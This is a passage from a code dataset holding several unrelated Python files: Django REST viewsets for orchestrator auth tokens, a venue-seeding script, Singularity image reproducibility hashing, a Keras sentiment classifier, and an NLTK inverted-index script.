sys.exit(0)\n except RuntimeError as err:\n print('Runtime Error: {0}'.format(err))\n sys.exit(2)\n","sub_path":"crowdin_tool/pogrep.py","file_name":"pogrep.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"366781617","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework import permissions, status, viewsets\nfrom rest_framework.exceptions import PermissionDenied\nfrom rest_framework.response import Response\n\nfrom ..models import Orchestrator, OrchestratorSerializer, OrchestratorAuth, OrchestratorAuthSerializer\n\nfrom utils import get_or_none\n\n\nclass OrchestratorViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows logs to be viewed\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, )\n serializer_class = OrchestratorSerializer\n\n lookup_field = 'orc_id'\n queryset = Orchestrator.objects.order_by('-name')\n\n permissions = {\n 'create': (permissions.IsAdminUser,),\n 'destroy': (permissions.IsAdminUser,),\n 'partial_update': (permissions.IsAdminUser,),\n 'update': (permissions.IsAdminUser,),\n }\n\n def get_permissions(self):\n \"\"\"\n Instantiates and returns the list of permissions that this view requires.\n \"\"\"\n return [permission() for permission in self.permissions.get(self.action, self.permission_classes)]\n\n\nclass OrchestratorAuthViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows logs to be viewed\n \"\"\"\n permission_classes = (permissions.IsAuthenticated, )\n serializer_class = OrchestratorAuthSerializer\n\n lookup_field = 'orc_id'\n queryset = OrchestratorAuth.objects.order_by('-user')\n\n def create(self, request, *args, **kwargs):\n data = request.data\n if not request.user.is_staff:\n data['user'] = request.user.username\n\n serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n\n self.perform_create(serializer)\n\n headers = self.get_success_headers(serializer.data)\n\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Return a list of all auth tokens that the user has permissions for\n \"\"\"\n queryset = self.filter_queryset(self.get_queryset())\n\n if not request.user.is_staff: # Standard User\n queryset = queryset.filter(user=request.user)\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n \"\"\"\n Return a specific auth toekn that the user has permissions for\n \"\"\"\n auth = self.get_object()\n\n if not request.user.is_staff: # Standard User\n if auth is not None and auth.user is not request.user:\n raise PermissionDenied(detail='User not authorised to access auth token', code=401)\n\n serializer = self.get_serializer(auth)\n return Response(serializer.data)\n\n def update(self, request, *args, **kwargs):\n auth = self.get_object()\n\n if not request.user.is_staff: # Standard User\n if auth is not None and auth.user is not request.user:\n raise PermissionDenied(detail='User not authorised to update auth token', code=401)\n\n return super(OrchestratorAuthViewSet, self).update(request, *args, **kwargs)\n\n def destroy(self, request, *args, **kwargs):\n auth = self.get_object()\n\n if not request.user.is_staff: # Standard User\n if auth is not None and auth.user is not request.user:\n raise PermissionDenied(detail='User not authorised to delete auth token', code=401)\n\n return super(OrchestratorAuthViewSet, self).destroy(request, *args, **kwargs)\n","sub_path":"orchestrator/gui/server/gui_server/orchestrator/views/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"436741018","text":"# coding=utf-8\r\nimport os\r\n\r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE',\r\n 'come_sesh_with_me.settings')\r\n\r\nimport django\r\n\r\ndjango.setup()\r\nfrom sesh.models import Category, Venue, Review\r\n\r\n\r\ndef populate():\r\n # First, we will create lists of dictionaries containing the pages\r\n # we want to add into each category.\r\n # Then we will create a dictionary of dictionaries for our categories.\r\n # This might seem a little bit confusing, but it allows us to iterate\r\n # through each data structure, and add the data to our models.\r\n\r\n night_clubs = [\r\n {\"name\": \"Garage\",\r\n\t\t\"rating\": \"3\",\r\n\t\t\"website\": \"http://garageglasgow.co.uk/\",\r\n\t\t\"description\": \"It's alright. \",\r\n \"location\":\"Glasgow\"},\r\n\t\t{\"name\": \"Kushion\",\r\n\t\t\"rating\": \"5\",\r\n\t\t\"website\": \":http://kushionglasgow.co.uk/\",\r\n\t\t\"description\": \"It has swings!!!!! SWINGS!!!!!\",\r\n \"location\": \"Glasgow\"},\r\n\t\t{\"name\": \"Sub Club\",\r\n\t\t\"rating\": \"2\",\r\n\t\t\"website\": \":http://subclub.co.uk/\",\r\n\t\t\"description\": \"Grimey and pretty sweaty and gross. All the music sounds the same.\",\r\n \"location\": \"Glasgow\"},\r\n\r\n\t\t{\"name\": \"Bamboo\",\r\n\t\t\"rating\": \"4\",\r\n\t\t\"website\": \"http://www.bamboo51.com/\",\r\n\t\t\"description\": \"Bamboo is a totally unique three roomed basement venue\"\r\n \" slap bang in the centre of Glasgow. With the best variety in\"\r\n \" music and drinks prices 5 nights a week, it’s no wonder \"\r\n \"it’s become one of Glasgow’s most popular nightclubs.\",\r\n \"location\": \"Glasgow\"}]# name, rating, website, description\r\n\r\n pubs=[\r\n\t {\"name\": \"Oran Mor\",\r\n\t \"rating\": \"5\",\r\n\t \"website\": \"http://oranmor.com\",\r\n \"location\": \"Glasgow\",\r\n\t \"description\": \"Oran Mor could barely have any more strings\"\r\n \" to its bow: pub-restaurant, brasserie, music venue, \"\r\n \"theatre, nightclub. There seems to be no containing the inexorable expansion of this hugely successful venue.\"},\r\n {\"name\": \"Firewater\",\r\n\t \"rating\": \"4\",\r\n\t \"website\": \"http://www.firewaterglasgow.com/?page_id=7746\",\r\n \"location\": \"Glasgow\",\r\n\t \"description\": \"Firewater opened in November 2001 with the mission to provide real music and hard liquor to the people of Glasgow.\"\r\n \"Their aim was to rebel against the sludge that pollutes the airwaves in the guise of popular music and fly the flag for Rock N Roll.\"\r\n \"From the 50’s to the present day classics, there is such a thing as a Firewater Anthem and you’ll know it when you hear it!\"},\r\n {\"name\": \"Strip joint\",\r\n \"rating\":\"3\",\r\n \"website\":\"http://stripjointglasgow.co.uk/\",\r\n \"location\": \"Glasgow\",\r\n \"description\":\"Located at the top of the Finnieston strip in Glasgow Strip Joint\"\r\n \" is ideally placed just a five minute walk from the SSE Hydro and \"\r\n \"the SECC. Strip joint is family friendly with a kids “make your own pizza” \"\r\n \"available all day where kids can top their own pizza right at the table.\"}]\r\n\r\n #reviews = [{\"name\": \"Jack\", \"venue\": \"Garage\", \"comment\": \"Had a fantastic night!\",\"likes\": 3,\"dislikes\": 2,\"rating\": 5},\r\n # {\"name\": \"Kate\", \"venue\": \"Garage\", \"comment\":\"Kinda ok\", \"likes\": 1, \"dislikes\": 3, \"rating\":3},\r\n # {\"name\": \"Stan\", \"venue\": \"Bamboo\", \"comment\": \"Wonderful\", \"likes\": 5, \"dislikes\": 0, \"rating\": 4},\r\n # {\"name\": \"Tom\", \"venue\": \"Oran Mor\", \"comment\": \"Not bad !\", \"likes\": 6, \"dislikes\": 3, \"rating\": 5},\r\n # {\"name\": \"Jack\", \"venue\": \"Strip joint\", \"comment\": \"Nice wee pub\", \"likes\": 3, \"dislikes\": 3, \"rating\": 3},\r\n # ]\r\n\r\n #users = [{\"name\":\"Jack\"},{\"name\":\"Kate\"},{\"name\":\"Stan\"},{\"name\":\"Tom\"}]\r\n\r\n cats = {\"Night clubs\": {\"venues\": night_clubs}, \"Pubs\": {\"venues\": pubs}}\r\n\r\n # If you want to add more catergories or pages,\r\n\r\n # add them to the dictionaries above.\r\n\r\n # The code below goes through the cats dictionary, then adds each category,\r\n # and then adds all the associated pages for that category.\r\n # if you are using Python 2.x then use cats.iteritems() see\r\n # http://docs.quantifiedcode.com/python-anti-patterns/readability/\r\n # for more information about how to iterate over a dictionary properly.\r\n\r\n\r\n for cat, cat_data in cats.items():\r\n c = add_cat(cat)\r\n for p in cat_data[\"venues\"]:\r\n add_venue(c, p[\"name\"], p[\"rating\"], p[\"website\"], p[\"description\"], p[\"location\"])\r\n #for review in reviews:\r\n # add_reviews(review, c, p[\"name\"], review[\"name\"])\r\n\r\n\r\n\r\n # Print out the categories we have added.\r\n for c in Category.objects.all():\r\n for p in Venue.objects.filter(category=c):\r\n print(\"- {0} - {1}\".format(str(c), str(p)))\r\n\r\n\r\ndef add_venue(cat, id, rating, url, description, location):\r\n p = Venue.objects.get_or_create(category=cat, name=id)[0]\r\n p.website = url\r\n p.rating = rating\r\n p.description = description\r\n p.location = location\r\n p.save()\r\n return p\r\n\r\ndef add_reviews(review, cat, id, name):\r\n #r = Review.objects.get_or_create(venue=Venue.objects.get_or_create(category=cat, name=id)[0], user=UserProfile.objects.)\r\n r = Review.objects.get_or_create(venue=Venue.objects.get(category=cat, name=id), user=UserProfile.objects.get_or_create(name)[0])[0]\r\n r.rating = review[\"rating\"]\r\n r.likes = review[\"likes\"]\r\n r.dislikes = review[\"dislikes\"]\r\n r.save()\r\n\r\n\r\ndef add_cat(name):\r\n c = Category.objects.get_or_create(name=name)[0]\r\n return c\r\n\r\n# Start execution here!\r\nif __name__ == '__main__':\r\n print(\"Starting Rango population script...\")\r\n populate()\r\n","sub_path":"come_sesh_with_me/populate_sesh.py","file_name":"populate_sesh.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"273007204","text":"'''\nreproduce.py: part of singularity package, functions to assess\n reproducibility of images\n\nThe MIT License (MIT)\n\nCopyright (c) 2016-2017 Vanessa Sochat\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n'''\n\nfrom singularity.cli import Singularity\nfrom singularity.logman import bot\nfrom singularity.utils import (\n get_installdir,\n read_json\n)\nimport datetime\nimport hashlib\nimport tarfile\nimport sys\nimport gc\nimport os\nimport re\nimport io\n\n\ndef assess_differences(image_file1,image_file2,levels=None,version=None,size_heuristic=False,\n guts1=None,guts2=None):\n '''assess_differences will compare two images on each level of \n reproducibility, returning for each level a dictionary with files\n that are the same, different, and an overall score.\n :param size_heuristic: if True, assess root owned files based on size\n :param guts1,guts2: the result (dict with sizes,roots,etc) from get_content_hashes\n '''\n if levels is None:\n levels = get_levels(version=version)\n\n reports = dict()\n scores = dict()\n\n for level_name, level_filter in levels.items():\n contenders = []\n different = []\n setdiff = []\n same = 0\n\n # Compare the dictionary of file:hash between two images, and get root owned lookup\n if guts1 is None:\n guts1 = get_content_hashes(image_path=image_file1,\n level_filter=level_filter,\n tag_root=True,\n include_sizes=True)\n \n if guts2 is None:\n guts2 = get_content_hashes(image_path=image_file2,\n level_filter=level_filter,\n tag_root=True,\n include_sizes=True)\n \n files = list(set(list(guts1['hashes'].keys()) + list(guts2['hashes'].keys())))\n\n for file_name in files:\n\n # If it's not in one or the other\n if file_name not in guts1['hashes'] or file_name not in guts2['hashes']:\n setdiff.append(file_name)\n\n else:\n if guts1['hashes'][file_name] == guts2['hashes'][file_name]:\n same+=1\n else:\n\n # If the file is root owned, we compare based on size\n if size_heuristic == True:\n if guts1['root_owned'][file_name] or guts2['root_owned'][file_name]:\n if guts1['sizes'][file_name] == guts2['sizes'][file_name]: \n same+=1\n else:\n different.append(file_name)\n else:\n # Otherwise, we can assess the bytes content by reading it\n contenders.append(file_name)\n else:\n contenders.append(file_name)\n\n # If the user wants identical (meaning extraction order and timestamps)\n if level_name == \"IDENTICAL\":\n different = different + contenders\n\n # Otherwise we need to check based on byte content\n else: \n if len(contenders) > 0:\n cli = Singularity()\n for rogue in contenders:\n hashy1 = extract_content(image_file1,rogue,cli,return_hash=True)\n hashy2 = extract_content(image_file2,rogue,cli,return_hash=True)\n \n # If we can't compare, we use size as a heuristic\n if hashy1 is None or hashy2 is None: # if one is symlink, could be None\n different.append(file_name) \n elif len(hashy1) == 0 or len(hashy2) == 0:\n if guts1['sizes'][file_name] == guts2['sizes'][file_name]: \n same+=1\n else:\n different.append(file_name) \n elif hashy1 != hashy2:\n different.append(rogue)\n else:\n same+=1\n\n # We use a similar Jacaard coefficient, twice the shared information in the numerator \n # (the intersection, same), as a proportion of the total summed files\n union = len(guts1['hashes']) + len(guts2['hashes'])\n\n report = {'difference': setdiff,\n 'intersect_different': different,\n 'same':same,\n 'union': union}\n \n if union == 0:\n scores[level_name] = 0\n else:\n scores[level_name] = 2*(same) / union\n reports[level_name] = report\n\n gc.collect()\n reports['scores'] = scores\n return reports\n\n\ndef get_custom_level(regexp=None,description=None,skip_files=None,include_files=None):\n '''get_custom_level will generate a custom level for the user, \n based on a regular expression. If used outside the context of tarsum, the user\n can generate their own named and described filters.\n :param regexp: must be defined, the file filter regular expression\n :param description: optional description\n '''\n if regexp == None:\n regexp = \".\"\n if description is None:\n description = \"This is a custom filter generated by the user.\"\n \n custom = {\"description\":description,\n \"regexp\":regexp}\n\n # Include extra files?\n if include_files is not None:\n if not isinstance(include_files,set):\n include_files = set(include_files)\n custom['include_files'] = include_files\n\n # Skip files?\n if skip_files is not None:\n if not isinstance(skip_files,set):\n skip_files = set(skip_files)\n custom['skip_files'] = skip_files\n\n return custom\n\n\ndef get_level(level,version=None,include_files=None,skip_files=None):\n '''get_level returns a single level, with option to customize files\n added and skipped.\n '''\n\n levels = get_levels(version=version)\n level_names = list(levels.keys())\n\n if level.upper() in level_names:\n level = levels[level]\n else:\n bot.logger.warning(\"%s is not a valid level. Options are %s\",level.upper(),\n \"\\n\".join(levels)) \n return None\n\n # Add additional files to skip or remove, if defined\n if skip_files is not None:\n level = modify_level(level,'skip_files',skip_files)\n if include_files is not None:\n level = modify_level(level,'include_files',include_files)\n\n level = make_level_set(level)\n return level\n\n\ndef modify_level(level,field,values,append=True):\n '''modify level is intended to add / modify a content type.\n Default content type is list, meaning the entry is appended.\n If you set append to False, the content will be overwritten\n For any other content type, the entry is overwritten.\n '''\n field = field.lower()\n valid_fields = ['regexp','skip_files','include_files']\n if field not in valid_fields:\n bot.logger.warning(\"%s is not a valid field, skipping. Choices are %s\",field,\",\".join(valid_fields))\n return level\n if append:\n if not isinstance(values,list):\n values = [values]\n if field in level:\n level[field] = level[field] + values\n else:\n level[field] = values\n else:\n level[field] = values\n\n level = make_level_set(level)\n\n return level \n\n\ndef get_levels(version=None):\n '''get_levels returns a dictionary of levels (key) and values (dictionaries with\n descriptions and regular expressions for files) for the user. \n :param version: the version of singularity to use (default is 2.2)\n :param include_files: files to add to the level, only relvant if\n '''\n valid_versions = ['2.3','2.2']\n\n if version is None:\n version = \"2.3\" \n version = str(version)\n\n if version not in valid_versions:\n bot.logger.error(\"Unsupported version %s, valid versions are %s\",version,\",\".join(valid_versions))\n\n levels_file = os.path.abspath(os.path.join(get_installdir(),\n 'hub',\n 'data',\n 'reproduce_levels.json'))\n levels = read_json(levels_file)\n if version == \"2.2\":\n # Labels not added until 2.3\n del levels['LABELS']\n\n levels = make_levels_set(levels)\n\n return levels\n\n\ndef make_levels_set(levels):\n '''make set efficient will convert all lists of items\n in levels to a set to speed up operations'''\n for level_key,level_filters in levels.items():\n levels[level_key] = make_level_set(level_filters)\n return levels\n \n\ndef make_level_set(level):\n '''make level set will convert one level into\n a set'''\n new_level = dict()\n for key,value in level.items():\n if isinstance(value,list):\n new_level[key] = set(value)\n else:\n new_level[key] = value\n return new_level \n\n\ndef include_file(member,file_filter):\n '''include_file will look at a path and determine\n if it matches a regular expression from a level\n '''\n member_path = member.name.replace('.','',1)\n\n if len(member_path) == 0:\n return False\n\n # Does the filter skip it explicitly?\n if \"skip_files\" in file_filter:\n if member_path in file_filter['skip_files']:\n return False\n\n # Include explicitly?\n if \"include_files\" in file_filter:\n if member_path in file_filter['include_files']:\n return True\n\n # Regular expression?\n if \"regexp\" in file_filter:\n if re.search(file_filter[\"regexp\"],member_path):\n return True\n return False\n\n\ndef is_root_owned(member):\n '''assess if a file is root owned, meaning \"root\" or user/group \n id of 0'''\n if member.uid == 0 or member.gid == 0:\n return True\n elif member.uname == 'root' or member.gname == 'root':\n return True\n return False\n \n\ndef assess_content(member,file_filter):\n '''Determine if the filter wants the file to be read for content.\n In the case of yes, we would then want to add the content to the\n hash and not the file object.\n '''\n member_path = member.name.replace('.','',1)\n\n if len(member_path) == 0:\n return False\n\n # Does the filter skip it explicitly?\n if \"skip_files\" in file_filter:\n if member_path in file_filter['skip_files']:\n return False\n\n if \"assess_content\" in file_filter:\n if member_path in file_filter['assess_content']:\n return True\n return False\n\n\ndef get_image_hashes(image_path,version=None,levels=None):\n '''get_image_hashes returns the hash for an image across all levels. This is the quickest,\n easiest way to define a container's reproducibility on each level.\n '''\n if levels is None:\n levels = get_levels(version=version)\n hashes = dict()\n for level_name,level_filter in levels.items():\n hashes[level_name] = get_image_hash(image_path,\n level_filter=level_filter)\n return hashes\n\n\ndef get_image_hash(image_path,level=None,level_filter=None,\n include_files=None,skip_files=None,version=None):\n '''get_image_hash will generate a sha1 hash of an image, depending on a level\n of reproducibility specified by the user. (see function get_levels for descriptions)\n the user can also provide a level_filter manually with level_filter (for custom levels)\n :param level: the level of reproducibility to use, which maps to a set regular\n expression to match particular files/folders in the image. Choices are in notes.\n :param skip_files: an optional list of files to skip\n :param include_files: an optional list of files to keep (only if level not defined)\n :param version: the version to use. If not defined, default is 2.3\n\n ::notes\n\n LEVEL DEFINITIONS\n The level definitions come down to including folders/files in the comparison. For files\n that Singularity produces on the fly that might be different (timestamps) but equal content\n (eg for a replication) we hash the content (\"assess_content\") instead of the file.\n ''' \n\n # First get a level dictionary, with description and regexp\n if level_filter is not None:\n file_filter = level_filter\n\n elif level is None:\n file_filter = get_level(\"RECIPE\",\n version=version,\n include_files=include_files,\n skip_files=skip_files)\n\n else:\n file_filter = get_level(level,version=version,\n skip_files=skip_files,\n include_files=include_files)\n \n cli = Singularity()\n file_obj,tar = get_memory_tar(image_path)\n hasher = hashlib.md5()\n\n for member in tar:\n member_name = member.name.replace('.','',1)\n\n # For files, we either assess content, or include the file\n if member.isdir() or member.issym():\n continue\n elif assess_content(member,file_filter):\n content = extract_content(image_path,member.name,cli)\n hasher.update(content)\n elif include_file(member,file_filter):\n buf = member.tobuf()\n hasher.update(buf)\n\n digest = hasher.hexdigest()\n file_obj.close()\n return digest\n\n\ndef extract_content(image_path,member_name,cli=None,return_hash=False):\n '''extract_content will extract content from an image using cat.\n If hash=True, a hash sum is returned instead\n '''\n if member_name.startswith('./'):\n member_name = member_name.replace('.','',1)\n if return_hash:\n hashy = hashlib.md5()\n if cli == None:\n cli = Singularity()\n content = cli.execute(image_path,'cat %s' %(member_name))\n if not isinstance(content,bytes):\n content = bytes(content)\n # If permissions don't allow read, return None\n if len(content) == 0:\n return None\n if return_hash:\n hashy.update(content)\n return hashy.hexdigest()\n return content\n\n\ndef get_content_hashes(image_path,level=None,regexp=None,include_files=None,tag_root=True,\n level_filter=None,skip_files=None,version=None,include_sizes=True):\n '''get_content_hashes is like get_image_hash, but it returns a complete dictionary \n of file names (keys) and their respective hashes (values). This function is intended\n for more research purposes and was used to generate the levels in the first place.\n If include_sizes is True, we include a second data structure with sizes\n ''' \n if level_filter is not None:\n file_filter = level_filter\n\n elif level is None:\n file_filter = get_level(\"REPLICATE\",version=version,\n skip_files=skip_files,\n include_files=include_files)\n\n else:\n file_filter = get_level(level,version=version,\n skip_files=skip_files,\n include_files=include_files)\n\n file_obj,tar = get_memory_tar(image_path)\n results = extract_guts(image_path,tar,file_filter,tag_root,include_sizes)\n file_obj.close()\n return results\n\n\ndef extract_guts(image_path, tar,file_filter,tag_root=True,include_sizes=True):\n '''extract_guts will extract the file guts from an in memory tarfile.\n The file is not closed.\n '''\n\n cli = Singularity()\n results = dict()\n digest = dict()\n\n if tag_root:\n roots = dict()\n\n if include_sizes: \n sizes = dict()\n\n for member in tar:\n member_name = member.name.replace('.','',1)\n included = False\n if member.isdir() or member.issym():\n continue\n elif assess_content(member,file_filter):\n digest[member_name] = extract_content(image_path,member.name,cli,return_hash=True)\n included = True\n elif include_file(member,file_filter):\n hasher = hashlib.md5()\n buf = member.tobuf()\n hasher.update(buf)\n digest[member_name] = hasher.hexdigest()\n included = True\n if included:\n if include_sizes:\n sizes[member_name] = member.size\n if tag_root:\n roots[member_name] = is_root_owned(member)\n\n results['hashes'] = digest\n if include_sizes:\n results['sizes'] = sizes\n if tag_root:\n results['root_owned'] = roots\n return results\n\n\ndef get_image_file_hash(image_path):\n '''get_image_hash will return an md5 hash of the file based on a criteria level.\n :param level: one of LOW, MEDIUM, HIGH\n :param image_path: full path to the singularity image\n '''\n hasher = hashlib.md5()\n with open(image_path, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hasher.update(chunk)\n return hasher.hexdigest()\n\n\ndef get_memory_tar(image_path):\n '''get an in memory tar of an image (does not require sudo!)'''\n cli = Singularity()\n if \"pancakes\" in os.environ:\n del os.environ['pancakes']\n byte_array = cli.export(image_path)\n file_object = io.BytesIO(byte_array)\n tar = tarfile.open(mode=\"r|*\", fileobj=file_object)\n return (file_object,tar)\n","sub_path":"singularity/reproduce.py","file_name":"reproduce.py","file_ext":"py","file_size_in_byte":18512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162938871","text":"import re\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport nltk\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom nltk.corpus import stopwords\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Conv1D, MaxPooling1D, Flatten, Embedding\nimport numpy as np\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nimport sys\n\n\n# A small pre-processing function to clean up\ndef clean_review(text):\n # Strip HTML tags\n text = re.sub('<[^<]+?>', ' ', text)\n text = text.replace('\\\\\"', '')\n text = text.replace('\"', '')\n text = re.sub(r'[\\r\\n]',' ',text)\n text = re.sub(r'[\\.!?,:] *', '. ', text)\n return text.strip()\n\n\ndef clean_score(num):\n\tif num > 10:\n\t\tnum = num/10\n\n\tif num<=5 :\n\t\treturn 0\n\telif num==5 or num==6:\n\t\treturn 0.5\n\telse:\n\t\treturn 1\n\t\ndef to_sequence(tokenizer, preprocessor, index, text):\n words = tokenizer(preprocessor(text))\n indexes = [index[word] for word in words if word in index]\n return indexes\n\n\ndef fill_set(str1='data/mc_training.csv', str2='data/mc_testing.csv'):\n\n\tdf2 = pd.read_csv(str1)\n\tdf3 = pd.read_csv(str2)\n\n\t#create cleaned review, which is every \"review\" entry passed through the clean_review function above\n\n\tdf2['cleaned_review'] = df2['body'].apply(clean_review)\n\tdf2['sentiment'] = df2['score'].apply(clean_score)\n\n\tdf3['cleaned_review'] = df3['body'].apply(clean_review)\n\tdf3['sentiment'] = df3['score'].apply(clean_score)\n\n\t#create test and training sets with a split\n\t#X_train, X_test, y_train, y_test = train_test_split(df['cleaned_review'], df['sentiment'], test_size=0.3)\n\n\treturn \t(df2['cleaned_review'], df3['cleaned_review'], df2['sentiment'], df3['sentiment'])\n\n\n\nclass sentMod:\n\n\n\tdef sequence_setup(self, X_train):\n\n\t\tself.vectorizer = CountVectorizer(binary=True, stop_words=stopwords.words('english'), min_df=3, max_df=0.9, max_features=None)\n\n\t\tX_train_onehot = self.vectorizer.fit_transform(X_train)\n\n\t\t#They take word-ids as input, so we first have to transform the input into a series of word ids\n\t\tself.word2idx = {word: idx for idx, word in enumerate(self.vectorizer.get_feature_names())}\n\t\tself.tokenize = self.vectorizer.build_tokenizer()\n\t\tself.preprocess = self.vectorizer.build_preprocessor()\n\t\t \n\t\tX_train_sequences = [to_sequence(self.tokenize, self.preprocess, self.word2idx, x) for x in X_train]\n\n\t\tself.MAX_SEQ_LENGHT = len(max(X_train_sequences, key=len))\n\t\tself.N_FEATURES = len(self.vectorizer.get_feature_names())\n\n\t\tX_train_sequences = pad_sequences(X_train_sequences, maxlen=self.MAX_SEQ_LENGHT, value=self.N_FEATURES)\n\n\t\treturn X_train_sequences\n\n\n\tdef create_model(self):\n\n\t\t# load training data\n\t\tX_train, X_test, y_train, y_test = fill_set()\n\t\t# setup preprocessing tools for embeddings\n\t\tX_train_sequences= self.sequence_setup(X_train)\n\n\t\t#Prepare model\n\t\tself.model = Sequential()\n\n\t\tself.model.add(Embedding(len(self.vectorizer.get_feature_names()) + 1, 64, input_length=self.MAX_SEQ_LENGHT))\n\t\tself.model.add(Conv1D(64, 5, activation='relu'))\n\t\tself.model.add(MaxPooling1D(5))\n\t\tself.model.add(Flatten())\n\t\tself.model.add(Dense(units=500, activation='relu', input_dim=len(self.vectorizer.get_feature_names())))\n\t\tself.model.add(Dense(units=1, activation='sigmoid'))\n\t\t\n\t\tself.model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\t\tself.model.summary()\n\n\t\tself.model.fit(X_train_sequences[:-100], y_train[:-100], epochs=3, batch_size=512, verbose=1, validation_data=(X_train_sequences[-100:], y_train[-100:]))\n\n\t\t# Test the out accuracy\n\t\tprint(\"Accuracy:\", self.get_accuracy()) \n\n\t\t# Save the model to the disk\n\t\tself.model.save(f'sentimentModel')\n\t\tprint('Sentiment Model Saved to Disk!')\n\n\n\tdef __init__(self, training= \"data/mc_training.csv\", testing=\"data/mc_testing.csv\"):\n\n\t\tif os.path.exists(\"sentimentModel/\") == False:\n\t\t\tself.create_model()\n\t\telse:\n\t\t\tX_train = fill_set(training, testing)[0]\n\t\t\tself.sequence_setup(X_train)\n\t\t\tself.model = load_model(\"sentimentModel/\")\n\t\t\tself.get_accuracy()\n\n\tdef format_predict( self, data):\n\t\ttemp_sequences = [to_sequence(self.tokenize, self.preprocess, self.word2idx, x) for x in data]\n\t\ttemp_sequences = pad_sequences(temp_sequences, maxlen=self.MAX_SEQ_LENGHT, value=self.N_FEATURES)\n\t\treturn temp_sequences\n\n\tdef get_accuracy(self):\n\t\tx, X_test,y, y_test = fill_set()\n\t\tX_test_sequences = self.format_predict( X_test)\n\t\tscores = self.model.evaluate(X_test_sequences, y_test, verbose=1)\n\t\tself.accuracy = scores[1]\n\t\treturn scores[1]\n\n\tdef get_results(self):\n\t\tx, X_test,y, y_test = fill_set()\n\t\tpredictions = self.model.predict(self.format_predict(X_test))\n\t\tresult= []\n\t\tfor pred in predictions:\n\t\t\tresult.append(pred[0])\n\t\treturn result\n\n\n\tdef predict(self, tests, pretty=False):\n\t\tif pretty == False:\n\t\t\treturn self.model.predict(self.format_predict(tests))\n\t\telse:\n\t\t\tpredictions = self.model.predict(self.format_predict(tests))\n\t\t\ti =0\n\t\t\t#print(len(predictions))\n\t\t\tfor pred in predictions:\n\t\t\t\tprint(tests[i] +\": \" + str(pred[0]))\n\t\t\t\ti+=1\n\n\ndef main():\n\n\tsent_tester = sentMod()\n\n\tprint(sent_tester.predict([\" I love this game, it's the best I have ever played!\" ,\"I hate this game, it's the worst I have ever played!\", \"Devil may cry\"]))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"sentAnalysis.py","file_name":"sentAnalysis.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"206636260","text":"\n# coding: utf-8\n\n# In[9]:\n\nimport re\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nporter = PorterStemmer()\n\ndef invertindex(docs=\"docs.txt\"):\n '''This fundtion will take the document txt folder (each line should indicate new document and the first token is document name)\n It will return the inverted index and the tokenized (and stemed) version of all the documents'''\n stemmed=[]\n infile = open(docs,'r')\n docs=infile.readlines()\n docs=[i.strip() for i in docs] #removing the \\n\n docs=[i.lower() for i in docs] #Lower Case\n tokenized = [word_tokenize(docs[i]) for i in range(len(docs))]\n [i.pop(0) for i in tokenized] # Removing the ID\n for i in range(len(docs)):\n stem = [porter.stem(word) for word in tokenized[i]]\n stemmed.append(stem)\n index=dict()\n for i in range(len(stemmed)):\n for word in set(stemmed[i]):\n if word in index:\n index[word].append(i+1)\n else:\n index[word]=[i+1]\n return(index,stemmed)\n\ndef positionalintersect(p1,p2,k,invertedindex,tokenized):\n '''This function is for proximity intersection of postings lists p1 and p2. The function finds places where the two terms appear within k words of each other and returns a list of triples giving docID and the term position in p1 and p2.'''\n answer=list()\n shareddoc = set(invertedindex[p1]) & set(invertedindex[p2]) #Find the shared documents set\n for i in shareddoc :\n # p1index=tokenized[i-1].index(p1)\n # p2index=tokenized[i-1].index(p2) \n p1indices = [i for i, x in enumerate(tokenized[i-1]) if x == p1]\n p2indices = [i for i, x in enumerate(tokenized[i-1]) if x == p2]\n l=list()\n for pp1 in p1indices:\n for pp2 in p2indices:\n while True:\n if abs(pp1-pp2) <= k:\n 